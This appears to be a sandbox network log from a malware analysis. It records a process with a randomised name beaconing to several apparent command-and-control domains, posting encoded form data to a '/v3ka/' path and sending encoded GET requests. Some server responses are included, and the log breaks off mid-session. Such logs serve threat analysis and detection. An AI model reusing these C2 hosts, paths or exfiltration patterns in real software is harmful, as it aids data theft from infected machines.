                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.clarycyber.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Mar 18, 2024 15:10:11.035219908 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/10.0
                                                                                    X-Powered-By: ASP.NET
                                                                                    Date: Mon, 18 Mar 2024 14:10:09 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 5105
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;
                                                                                    Mar 18, 2024 15:10:11.035245895 CET  1286  IN
                                                                                    Data Ascii: color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relativ
                                                                                    Mar 18, 2024 15:10:11.035351038 CET  1286  IN
                                                                                    Data Ascii: 33;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or i
                                                                                    Mar 18, 2024 15:10:11.035399914 CET  1286  IN
                                                                                    Data Ascii: sp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070
                                                                                    Mar 18, 2024 15:10:11.035413980 CET  180  IN
                                                                                    Data Ascii: ef="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    25  192.168.11.30  49836  91.195.240.19  80  6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Mar 18, 2024 15:10:16.329777002 CET  742  OUT  POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.mvmusicfactory.org
                                                                                    Origin: http://www.mvmusicfactory.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.mvmusicfactory.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=htpeZlQ5V/ks6AI+6dlgyJaBbRMMtwISmsbQhSiT4nwxK6iHntBNobHVoNikBdJOn9XEjTZ+1SPEJxV9EbygFlvTK976jT8cdaaYl2PLErkQfqnL+pjsgvk/nndxQUPNF5+xR48KX5m08VLcCi9LutuqDnv94iWkEtruUyt+MTUfVyuvYVqXk8WQnnFyaq2TNw==
                                                                                    Mar 18, 2024 15:10:16.512376070 CET  299  IN  HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 14:10:16 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    26  192.168.11.30  49837  91.195.240.19  80  6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Mar 18, 2024 15:10:19.031209946 CET  762  OUT  POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.mvmusicfactory.org
                                                                                    Origin: http://www.mvmusicfactory.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.mvmusicfactory.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=htpeZlQ5V/ksoQ4+56Zg1paGUxMMjQIemtnQhQOD5SYxLfeHmvpNrbHVmtjvP9JHn9bijXd+1SbEJ1Z9EIqhF1vrCd78nT8cdaaYlyusErsQcaXL/LLjtPkwiXdxGUOGF5/WR6JCX/i08RDcCwVK1duwNHus2S3BOv/tEFJFVyscUlf1FWeV3cq97moaYo3IQ4iq4AvA4uPyPdBCwl/DH74=
                                                                                    Mar 18, 2024 15:10:19.213391066 CET  299  IN  HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 14:10:19 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    27  192.168.11.30  49838  91.195.240.19  80  6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Mar 18, 2024 15:10:21.734164000 CET  1679  OUT  POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.mvmusicfactory.org
                                                                                    Origin: http://www.mvmusicfactory.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.mvmusicfactory.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=htpeZlQ5V/ksoQ4+56Zg1paGUxMMjQIemtnQhQOD5UAxKtmHmOpNqbHVuNioP9IHn+rujSFU1RjEPgF9QtGhWVvrO979jT8Ndaqcl2KsErsQcYPL5ZjjvPk/nnd9QUPhF9SpR6cgWPC08w/cAD9KotuuKHu02S7SOpaeEFVjVwMcUhfrdz+dt9Sj22sePpidequF5T+4/sCfXJdIhnnpU+vaEZBKXJC2vchdnpk8/NVf0LUk7V6Fkodm1K54/qKETqaeuXAUWXn/HyIp2pAd8QBiL9FT83QzNDKseJtVAWUUperOREC83yNBzTerH6kZ0m5bcKS0KRBThY5V+yE8DxozxJYQ3d69W4sAhIGl6ICqYCcQ+7R4TJiOC3dQsu+ruPmm9gRR93+mtF7jK7clNDp04ulVo7VODgjt5BBklVrnJKvnVO0r6lMUCjdpFZoL71CdQx+Ytqf7S+1X+3AKe23VWu/7BmgVQnFFayGsZmdUPVHc2f0WLqynVLNlGKiyp4PkYJJD5mbpo6nWSkF6N3lj7MPDTE2mlXTzCgFmgj7GOWLXZ3Vqg0OIoBPeDThEg8sBrFcqbT31wCTevwqOYd/wv5CW62NMcgDmyA2xiJrk3Jzvtexgu3N2UmzWKjaqZ3ew29s+QsH5zb9kLF4iCyifm7+k36xqgmI+Wsp5Ya+gkKuOzd3qp9dlawelaJRhGmxX9p3E14MOUqEitOa7nNI1VlIai5JvFn9jjBOeIUUya4JwiyzR+wrcuHtn9aZ9REQavR6q7VTseSiZYjth6mtA183CdSFJu/DvcM4is+70E8PtKriYicPo+5R0K4Z5tDWILvbNiklMkobL5E+fu+dRNrXAdD2jzy0UG6NPwjdvyZznkyXyZQeUU1NA3jtNCLAe/QjrXIPX04ZB2wq65a3pKqTuL0aHeIpNaAVwTiLy0OCpX6O5vHeBGu+Im6efuau5jgVWUcIr8rtboqJQmtbHU+xZEeGCzHmxGiaQVN465Rf9DdY4et/iS7nBwxYiVG7C82ez8NzEJXb/R/jf8jTwL+UnM6KGiH4tulrjFNHSyB5+7jVHVwoxf1oeLMSMpEmnyePmjZ/czCpbkORET3xTydI+fRKMYPhANj7UAYRD
                                                                                    Mar 18, 2024 15:10:21.917275906 CET  299  IN  HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 14:10:21 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    28  192.168.11.30  49839  91.195.240.19  80  6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Mar 18, 2024 15:10:24.436081886 CET  464  OUT  GET /v3ka/?c4qx7JIP=svB+aVl3D/Qs3yYm3uEZx4nnJil+hT1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36DGpX5UBaKLpwaX6qds=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.mvmusicfactory.org
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:10:24.653352976 CET  1286  IN  HTTP/1.1 200 OK
                                                                                    date: Mon, 18 Mar 2024 14:10:24 GMT
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    transfer-encoding: chunked
                                                                                    vary: Accept-Encoding
                                                                                    x-powered-by: PHP/8.1.17
                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    pragma: no-cache
                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ElQkokIyThrk3pYerPB6MjAnPczDOy8Z3TT02PZqKru+pgu5kt8h9x6gRDWTFkcsx9hYFG+7N+fGmHea5Z4vcw==
                                                                                    last-modified: Mon, 18 Mar 2024 14:10:24 GMT
                                                                                    x-cache-miss-from: parking-5747c769c4-wlt8g
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ElQkokIyThrk3pYerPB6MjAnPczDOy8Z3TT02PZqKru+pgu5kt8h9x6gRDWTFkcsx9hYFG+7N+fGmHea5Z4vcw==><head><meta charset="utf-8"><title>mvmusicfactory.org&nbsp;-&nbsp;mvmusicfactory Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="mvmusicfactory.org is your first and best source for all of the information youre looking f
                                                                                    Mar 18, 2024 15:10:24.653379917 CET  1286  IN
                                                                                    Data Ascii: or. From general topics to more of what you would expect to find here, mvmusicfactory.org has it all. We h1062ope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/t
                                                                                    Mar 18, 2024 15:10:24.653424025 CET  1286  IN
                                                                                    Data Ascii: ){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webki
                                                                                    Mar 18, 2024 15:10:24.653585911 CET  1286  IN
                                                                                    Data Ascii: nouncement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-
                                                                                    Mar 18, 2024 15:10:24.653703928 CET  1286  IN
                                                                                    Data Ascii: imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-
                                                                                    Mar 18, 2024 15:10:24.653759956 CET  1286  IN
                                                                                    Data Ascii: l .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline
                                                                                    Mar 18, 2024 15:10:24.653805971 CET690INData Raw: 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61
                                                                                    Data Ascii: lor:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-s
                                                                                    Mar 18, 2024 15:10:24.654005051 CET1286INData Raw: 31 32 34 30 0d 0a 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b
                                                                                    Data Ascii: 1240rder-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:transla
                                                                                    Mar 18, 2024 15:10:24.654031992 CET1286INData Raw: 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65
                                                                                    Data Ascii: ex:-1;top:50px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(
                                                                                    Mar 18, 2024 15:10:24.654230118 CET1286INData Raw: 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 36 70 78 20 30 3b 6d 61 72 67 69 6e 3a 2e 31 31 65 6d 20 30 3b 6c 69 6e 65 2d 68
                                                                                    Data Ascii: 01}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two
                                                                                    Mar 18, 2024 15:10:24.835449934 CET1286INData Raw: 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 31 34 34 30 70 78 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6e 63 2d
                                                                                    Data Ascii: o;max-width:1440px}.nc-container{width:100%;text-align:center;margin-top:10px}.nc-container span{font-family:Ariel,sans-serif;font-size:16px;color:#888} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"single


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    29 | 192.168.11.30 | 49840 | 103.146.179.172 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:10:34.275185108 CET | 727 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.kmyangjia.com
                                                                                    Origin: http://www.kmyangjia.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.kmyangjia.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=eSrBeFccoZwwDpf6Y91jwMV62sLM6WmwIa/PG9fHSzXaZgXK9jXc5F76vNgTcP6JPi7hrKHRP2M1Fapay5zru5PWYw0Z7bJHqL7T6X9uOVEfd5Bp32VyHvHjmCNNWwIwlEdg1BH9O35n1d2pFAhIZatdGWBRlY1M4w8DV5rRWlKWPfoXFWxvHTEYvKaqh99/dA==
                                                                                    Mar 18, 2024 15:10:34.607134104 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:10:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 146
                                                                                    Connection: close
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    30 | 192.168.11.30 | 49841 | 103.146.179.172 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:10:37.130934954 CET | 747 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.kmyangjia.com
                                                                                    Origin: http://www.kmyangjia.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.kmyangjia.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=eSrBeFccoZwwDJv6eahj2sV9o8LM02m8IazPG8rtRBDaZFzK6n7c8F76o9gWRv6CPi3prKLRP2I1Fb1ayOfo0JPUEw0blrJHqL7T6UBIOUsfdpxplE9xEvHiwyNNBgJYlEc11FOgO0Nn1cGpFRhJTatbbGAfs9YD0AMgeKr+PFKVDoZNYVFtUz41zL3Cj/8kAIiwR7PnlsOXWEtc3bwKIcQ=
                                                                                    Mar 18, 2024 15:10:37.462805033 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:10:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 146
                                                                                    Connection: close
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    31 | 192.168.11.30 | 49842 | 103.146.179.172 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:10:39.990432024 CET | 1664 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.kmyangjia.com
                                                                                    Origin: http://www.kmyangjia.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.kmyangjia.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:10:40.322490931 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:10:40 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 146
                                                                                    Connection: close
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    32 | 192.168.11.30 | 49843 | 103.146.179.172 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:10:42.848279953 CET | 459 | OUT | GET /v3ka/?c4qx7JIP=TQDhdygg/6k1FrT3duJj1OYD3+fr21m2MLjtTeKUejKDGRun2D/B3i3kqoFCSoO3Pw/E65XWfWwoO6YHx8j54r/FSG1v4bIQ+pjQtA18fUYdL5hShFxGKN0=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.kmyangjia.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:10:43.179832935 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:10:43 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 146
                                                                                    Connection: close
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    33 | 192.168.11.30 | 49844 | 109.234.166.81 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:10:48.749150991 CET | 754 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.globalworld-travel.com
                                                                                    Origin: http://www.globalworld-travel.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.globalworld-travel.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=IrqYfbxTJNdcEi/mtx5zHvo2zHPS4n+TVfOzBjJIkHMpjTH1/NPwKID1wZ/UXWT3WSoLsfSzTC+p9chAzvhaTXEU0SHdLTv6AHrFljEpUSK42cE4aTS/d91Cvpn0e41NheXD/DQCJNzB2MMcwdBB/hY2KGeieRhGX5wmjPU4NdhrRTRVk/J03K6RLHIYrBuycA==
                                                                                    Mar 18, 2024 15:10:48.923027992 CET | 678 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                    Date: Mon, 18 Mar 2024 14:10:48 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                    referer-policy: same-origin
                                                                                    set-cookie: o2s-chl=3740ae8a9502784d81db4ef0b2b153c8; domain=.globalworld-travel.com; expires=Tue, 19-Mar-24 14:10:48 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                    location: http://www.globalworld-travel.com/v3ka/
                                                                                    tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                    Server: o2switch-PowerBoost-v3
                                                                                    Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 10


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    34 | 192.168.11.30 | 49845 | 109.234.166.81 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:10:51.453597069 CET | 774 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.globalworld-travel.com
                                                                                    Origin: http://www.globalworld-travel.com
